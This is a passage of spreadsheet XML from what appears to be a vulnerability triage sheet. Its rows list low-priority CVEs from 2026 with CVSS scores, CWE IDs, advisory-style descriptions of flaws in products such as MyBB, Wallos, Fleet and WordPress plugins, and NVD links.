          <t>Missing Authorization vulnerability in Gastromenum Gastromenum Ticket and QR Menu System allows Accessing Functionality Not Properly Constrained by ACLs.
This issue affects Gastromenum Ticket and QR Menu System: before 2026.08.31.</t>
        </is>
      </c>
      <c r="M5590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19081</t>
        </is>
      </c>
    </row>
    <row r="5591">
      <c r="A5591" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19182</t>
        </is>
      </c>
      <c r="C5591" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5591" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5591" s="5" t="inlineStr"/>
      <c r="F5591" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5591" s="5" t="inlineStr"/>
      <c r="H5591" s="5" t="inlineStr"/>
      <c r="I5591" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J5591" s="5" t="inlineStr"/>
      <c r="K5591" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5591" s="5" t="inlineStr">
        <is>
          <t>An incorrect authorization check in the v2 Alarm REST API in OpenNMS Meridian and Horizon allows a low-privileged authenticated user (ROLE_REST) to acknowledge, escalate, or clear alarms recorded as an arbitrary username, and, when also assigned ROLE_READONLY, to modify alarm state despite the read-only restriction. A credential check that should restrict these operations is guarded by an inverted condition, so it never executes for a real (non-blank) username. This can potentially allow an attacker to compromise the integrity of alarm state and audit records.
The solution is to upgrade to Meridian 2024.3.12, 2025.0.9 and Horizon 36.0.3 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.</t>
        </is>
      </c>
      <c r="M5591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19182</t>
        </is>
      </c>
    </row>
    <row r="5592">
      <c r="A5592" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19802</t>
        </is>
      </c>
      <c r="C5592" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5592" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5592" s="5" t="inlineStr"/>
      <c r="F5592" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5592" s="5" t="inlineStr"/>
      <c r="H5592" s="5" t="inlineStr"/>
      <c r="I5592" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5592" s="5" t="inlineStr"/>
      <c r="K5592" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5592" s="5" t="inlineStr">
        <is>
          <t>The Checkout Custom Fields Builder for WooCommerce plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.5. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate an arbitrary attacker-hosted plugin, resulting in remote code execution on the server. The required nonce is emitted inline on all admin pages accessible to subscribers when WooCommerce is inactive, meaning any subscriber-level user can harvest it and trigger the exploit without any additional privileges.</t>
        </is>
      </c>
      <c r="M5592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19802</t>
        </is>
      </c>
    </row>
    <row r="5593">
      <c r="A5593" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19946</t>
        </is>
      </c>
      <c r="C5593" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5593" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5593" s="5" t="inlineStr"/>
      <c r="F5593" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5593" s="5" t="inlineStr"/>
      <c r="H5593" s="5" t="inlineStr"/>
      <c r="I5593" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5593" s="5" t="inlineStr"/>
      <c r="K5593" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5593" s="5" t="inlineStr">
        <is>
          <t>The Awesome Support plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 6.3.9. This is due to a missing capability check on the wpas_do_mr_deny_user() function, which unlike its counterpart wpas_do_mr_activate_user() does not enforce current_user_can('edit_users') or current_user_can('edit_user', $user_id), relying solely on a nonce that is not scoped to the target user. This makes it possible for authenticated attackers, with subscriber-level access and above, to set the mr_user_denied flag on any user account — including administrators — permanently blocking their moderated activation and dispatching a denial notification email to the victim.</t>
        </is>
      </c>
      <c r="M5593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19946</t>
        </is>
      </c>
    </row>
    <row r="5594">
      <c r="A5594" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28627</t>
        </is>
      </c>
      <c r="C5594" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5594" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5594" s="5" t="inlineStr"/>
      <c r="F5594" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5594" s="5" t="inlineStr"/>
      <c r="H5594" s="5" t="inlineStr"/>
      <c r="I5594" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5594" s="5" t="inlineStr"/>
      <c r="K5594" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="L5594" s="5" t="inlineStr">
        <is>
          <t>In btm_sec_encrypt_change of btm_sec.cc, there is a possible downgrade attack due to a logic error in the code. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28627</t>
        </is>
      </c>
    </row>
    <row r="5595">
      <c r="A5595" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5595" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33047</t>
        </is>
      </c>
      <c r="C5595" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5595" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5595" s="5" t="inlineStr"/>
      <c r="F5595" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5595" s="5" t="inlineStr"/>
      <c r="H5595" s="5" t="inlineStr"/>
      <c r="I5595" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J5595" s="5" t="inlineStr"/>
      <c r="K5595" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5595" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, an object can be locked by a user who is not assigned write permissions. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M5595" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33047</t>
        </is>
      </c>
    </row>
    <row r="5596">
      <c r="A5596" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5596" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-41262</t>
        </is>
      </c>
      <c r="C5596" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5596" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5596" s="5" t="inlineStr"/>
      <c r="F5596" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5596" s="5" t="inlineStr"/>
      <c r="H5596" s="5" t="inlineStr"/>
      <c r="I5596" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J5596" s="5" t="inlineStr"/>
      <c r="K5596" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5596" s="5" t="inlineStr">
        <is>
          <t>Fleet is an open-source device management platform built on osquery. In versions prior to 4.85.0, the global policy read endpoint (GET /api/latest/fleet/policies/{policy_id}) fails to verify team ownership of the requested policy, allowing an authenticated user with observer-level access on any single team to read the full details of policies belonging to any other team and bypass Fleet's team isolation model. The handler authorizes the request against an empty policy object whose TeamID is nil, which an authorization rule permits for any user holding a role on any team, and then fetches the policy by ID with no team filter and returns it without any post-fetch scope check. Because policy IDs are sequential integers, an attacker can enumerate them to read other teams' policy SQL queries, host pass and fail counts, and associated software-installer and script metadata, exposing security-monitoring strategies and compliance posture across team boundaries. This issue is fixed in version 4.85.0.</t>
        </is>
      </c>
      <c r="M5596" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-41262</t>
        </is>
      </c>
    </row>
    <row r="5597">
      <c r="A5597" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5597" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42806</t>
        </is>
      </c>
      <c r="C5597" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5597" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5597" s="5" t="inlineStr"/>
      <c r="F5597" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5597" s="5" t="inlineStr"/>
      <c r="H5597" s="5" t="inlineStr"/>
      <c r="I5597" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5597" s="5" t="inlineStr"/>
      <c r="K5597" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5597" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read vulnerability was discovered in the Bosch BME690 SensorAPI (C-driver) in version v1.0.3 and prior, specifically within the field data parsing logic in read_all_field_data (bme69x.c).
The driver prefetches heater configuration registers into a contiguous 30-byte stack buffer (set_val) mapping IDAC, RES_HEAT, and GAS_WAIT tables.
When parsing sensor field data, the gas_index is extracted using a 4-bit mask (0..15) but lacks boundary verification against the valid range (0..9).
An attacker or a compromised peripheral mimicking a sensor on the I2C/SPI bus could return a payload with a gas index value of 10 or higher.
This causes the driver to perform an out-of-bounds array access (set_val[20 + gas_index]), reading up to 6 bytes past the stack buffer.
The leaked out-of-bounds byte is then written into the public gas_wait field, which may lead to measurement corruption or leak adjacent stack memory when telemetered or logged.</t>
        </is>
      </c>
      <c r="M5597" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42806</t>
        </is>
      </c>
    </row>
    <row r="5598">
      <c r="A5598" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5598" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45121</t>
        </is>
      </c>
      <c r="C5598" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5598" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5598" s="5" t="inlineStr"/>
      <c r="F5598" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5598" s="5" t="inlineStr"/>
      <c r="H5598" s="5" t="inlineStr"/>
      <c r="I5598" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5598" s="5" t="inlineStr"/>
      <c r="K5598" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5598" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the calendar module does not check permissions consistently when listing calendars, allowing authenticated users to access titles of calendars that are otherwise inaccessible. The affected calendar-selection paths in calendar.php perform permission checks against an invalid calendar context before returning calendar titles. The uniquely identifying implementation details include titles of inaccessible calendars, and invalid calendar permission context. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45121</t>
        </is>
      </c>
    </row>
    <row r="5599">
      <c r="A5599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45122</t>
        </is>
      </c>
      <c r="C5599" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5599" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5599" s="5" t="inlineStr"/>
      <c r="F5599" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5599" s="5" t="inlineStr"/>
      <c r="H5599" s="5" t="inlineStr"/>
      <c r="I5599" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5599" s="5" t="inlineStr"/>
      <c r="K5599" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5599" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the calendar module does not validate moderation permissions for the destination calendar when moving events. A user with moderation permission for the source calendar can move an event to a calendar where the user has only viewing permission because the do_move action in calendar.php does not check canmoderateevents for the target calendar. The uniquely identifying implementation details include calendar event move, source calendar moderation permission, and destination calendar viewing permission. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45122</t>
        </is>
      </c>
    </row>
    <row r="5600">
      <c r="A5600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45123</t>
        </is>
      </c>
      <c r="C5600" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5600" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5600" s="5" t="inlineStr"/>
      <c r="F5600" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5600" s="5" t="inlineStr"/>
      <c r="H5600" s="5" t="inlineStr"/>
      <c r="I5600" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5600" s="5" t="inlineStr"/>
      <c r="K5600" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5600" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the remote requests feature does not correctly handle IPv6 addresses, resulting in a server-side request forgery vulnerability. The default disallowed remote hosts list does not include IPv6 addresses. Verification in fetch_remote_file() fails open when get_ip_by_hostname() returns no result because that function does not return IPv6 results, allowing a crafted remote target to bypass the host restriction. The uniquely identifying implementation details include fail-open verification, and inc/functions.php. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45123</t>
        </is>
      </c>
    </row>
    <row r="5601">
      <c r="A5601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45124</t>
        </is>
      </c>
      <c r="C5601" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5601" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5601" s="5" t="inlineStr"/>
      <c r="F5601" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5601" s="5" t="inlineStr"/>
      <c r="H5601" s="5" t="inlineStr"/>
      <c r="I5601" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5601" s="5" t="inlineStr"/>
      <c r="K5601" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5601" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the Mod CP Report Center does not check permissions consistently, allowing moderators without report-management permission to mark reports as resolved. The modcp.php?action=do_reports Mark Selected as Read handler is reachable with canmodcp even without canmanagereportedcontent or canmanagereportedposts. When no forums are in scope, $flist_reports is empty and the UPDATE mybb_reportedcontent query executes without the expected permission-based limitation. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45124</t>
        </is>
      </c>
    </row>
    <row r="5602">
      <c r="A5602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45527</t>
        </is>
      </c>
      <c r="C5602" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5602" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5602" s="5" t="inlineStr"/>
      <c r="F5602" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5602" s="5" t="inlineStr"/>
      <c r="H5602" s="5" t="inlineStr"/>
      <c r="I5602" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5602" s="5" t="inlineStr"/>
      <c r="K5602" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L5602" s="5" t="inlineStr">
        <is>
          <t>In convertCleanApertureToRect of HeifCleanAperture.cpp, there is a possible way to cause a temporary denial of service due to an integer overflow. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M5602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45527</t>
        </is>
      </c>
    </row>
    <row r="5603">
      <c r="A5603" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47232</t>
        </is>
      </c>
      <c r="C5603" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5603" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5603" s="5" t="inlineStr"/>
      <c r="F5603" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5603" s="5" t="inlineStr"/>
      <c r="H5603" s="5" t="inlineStr"/>
      <c r="I5603" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5603" s="5" t="inlineStr"/>
      <c r="K5603" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5603" s="5" t="inlineStr">
        <is>
          <t>Admidio is an open-source user management solution. Prior to version 5.0.10, the sensitive `mode=export` action in `modules/sso/keys.php` exports a PKCS#12 bundle containing the configured private key and certificate, but the CSRF validation line is commented out. A forged cross-site POST from an administrator session can therefore trigger private key export without a valid form token. Version 5.0.10 contains a fix.</t>
        </is>
      </c>
      <c r="M5603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47232</t>
        </is>
      </c>
    </row>
    <row r="5604">
      <c r="A5604" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47245</t>
        </is>
      </c>
      <c r="C5604" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5604" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5604" s="5" t="inlineStr"/>
      <c r="F5604" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5604" s="5" t="inlineStr"/>
      <c r="H5604" s="5" t="inlineStr"/>
      <c r="I5604" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5604" s="5" t="inlineStr"/>
      <c r="K5604" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="L5604" s="5" t="inlineStr">
        <is>
          <t>MyBB is free and open source forum software. Prior to 1.8.40, the User CP Buddy/Ignore List component does not validate reciprocal buddy-list updates correctly. The usercp.php?action=do_editlists delete handler removes the selected entry from the acting user's list and then updates mybb_users.buddylist for the target account. The reciprocal update searches for the deleted target UID instead of the acting user's UID and uses the unchecked array_search() return value as an array key. A false result can be converted to index 0, removing the target account's first stored buddy while leaving the actual reciprocal entry unchanged. The uniquely identifying implementation details include false converted to index 0. This issue is fixed in version 1.8.40.</t>
        </is>
      </c>
      <c r="M5604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47245</t>
        </is>
      </c>
    </row>
    <row r="5605">
      <c r="A5605" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50198</t>
        </is>
      </c>
      <c r="C5605" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5605" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5605" s="5" t="inlineStr"/>
      <c r="F5605" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5605" s="5" t="inlineStr"/>
      <c r="H5605" s="5" t="inlineStr"/>
      <c r="I5605" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5605" s="5" t="inlineStr"/>
      <c r="K5605" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5605" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.1, an authenticated user can edit their own inactive subscription and set replacement_subscription_id to a subscription ID belonging to another user. The write is accepted, and later the stats logic dereferences that foreign subscription ID without user_id scoping. This lets the attacker infer the victim subscription's monthly-normalized cost by observing changes in their own stats output. This does not expose the full victim subscription object, but it does expose derived financial metadata. This issue has been patched in version 4.9.1.</t>
        </is>
      </c>
      <c r="M5605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50198</t>
        </is>
      </c>
    </row>
    <row r="5606">
      <c r="A5606" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50199</t>
        </is>
      </c>
      <c r="C5606" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5606" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5606" s="5" t="inlineStr"/>
      <c r="F5606" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5606" s="5" t="inlineStr"/>
      <c r="H5606" s="5" t="inlineStr"/>
      <c r="I5606" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5606" s="5" t="inlineStr"/>
      <c r="K5606" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5606" s="5" t="inlineStr">
        <is>
          <t>Wallos is an open-source, self-hostable personal subscription tracker. Prior to version 4.9.1, endpoints/currency/update_exchange.php loads the first Fixer/API Layer credential globally instead of loading the credential for the authenticated user. As a result, a normal authenticated user without their own provider key can trigger exchange-rate refreshes using another user's stored provider credential. This issue has been patched in version 4.9.1.</t>
        </is>
      </c>
      <c r="M5606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50199</t>
        </is>
      </c>
    </row>
    <row r="5607">
      <c r="A5607" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52730</t>
        </is>
      </c>
      <c r="C5607" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5607" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5607" s="5" t="inlineStr"/>
      <c r="F5607" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5607" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5607" s="5" t="inlineStr"/>
      <c r="I5607" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5607" s="5" t="inlineStr"/>
      <c r="K5607" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5607" s="5" t="inlineStr">
        <is>
          <t>Xibo is an open source digital signage platform with a web content management system and Windows display player software. Prior to 4.4.3, missing Authorization in Module::settingsForm allows to view (not change) super admin-restricted module settings and leak the full module entity. Exploitation of the vulnerability is possible on behalf of an authorized user who has access to the Module View feature, which are not granted to non-admins as standard. Users should upgrade to version 4.4.3 which fixes this issue. Upgrading to a fixed version is necessary to remediate. Users unable to upgrade should revoke such privileges from users they do not trust.</t>
        </is>
      </c>
      <c r="M5607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52730</t>
        </is>
      </c>
    </row>
    <row r="5608">
      <c r="A5608" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53487</t>
        </is>
      </c>
      <c r="C5608" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5608" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5608" s="5" t="inlineStr"/>
      <c r="F5608" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5608" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H5608" s="5" t="inlineStr"/>
      <c r="I5608" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J5608" s="5" t="inlineStr"/>
      <c r="K5608" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5608" s="5" t="inlineStr">
        <is>
          <t>Kite is a Kubernetes dashboard. Prior to version 0.12.3, authenticated Kite users with any role can request `/api/v1/overview` for a cluster that their roles do not permit by selecting that cluster with `x-cluster-name`. The overview route is registered before `middleware.RBACMiddleware()` and `GetOverview` only checks `len(user.Roles) &gt; 0`, so it returns aggregate Kubernetes inventory and capacity data from unauthorized clusters. Version 0.12.3 fixes the issue.</t>
        </is>
      </c>
      <c r="M5608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53487</t>
        </is>
      </c>
    </row>
    <row r="5609">
      <c r="A5609" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53541</t>
        </is>
      </c>
      <c r="C5609" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5609" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5609" s="5" t="inlineStr"/>
      <c r="F5609" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5609" s="5" t="inlineStr">
        <is>
          <t>db2</t>
        </is>
      </c>
      <c r="H5609" s="5" t="inlineStr"/>
      <c r="I5609" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J5609" s="5" t="inlineStr"/>
      <c r="K5609" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5609" s="5" t="inlineStr">
        <is>
          <t>OliveTin gives access to predefined shell commands from a web interface. The `filterToDefinedArgumentsOnly` function in the executor is intended to discard any arguments not explicitly defined in the action's configuration. However, prior to commit ebffd9f040f791208aee1db2e5a8aecd1e3e603d, a special case allows any argument whose name starts with `ot_` to bypass this filter. While two system arguments (`ot_executionTrackingId` and `ot_username`) are injected by OliveTin and overridden, all other `ot_`-prefixed arguments supplied by the user pass through unmodified. These bypassed arguments are not type-checked — the validation loop only iterates over the action's defined arguments, so `ot_`-prefixed arguments skip all type safety checks entirely; set as environment variables — via `buildEnv()`, with completely unvalidated values, and passed to the executed command; and included in the template context — available as `.Arguments.ot_*` in template rendering. Commit ebffd9f040f791208aee1db2e5a8aecd1e3e603d contains a patch.</t>
        </is>
      </c>
      <c r="M5609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53541</t>
        </is>
      </c>
    </row>
    <row r="5610">
      <c r="A5610" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53584</t>
        </is>
      </c>
      <c r="C5610" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="D5610" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5610" s="5" t="inlineStr"/>
      <c r="F5610" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5610" s="5" t="inlineStr"/>
      <c r="H5610" s="5" t="inlineStr"/>
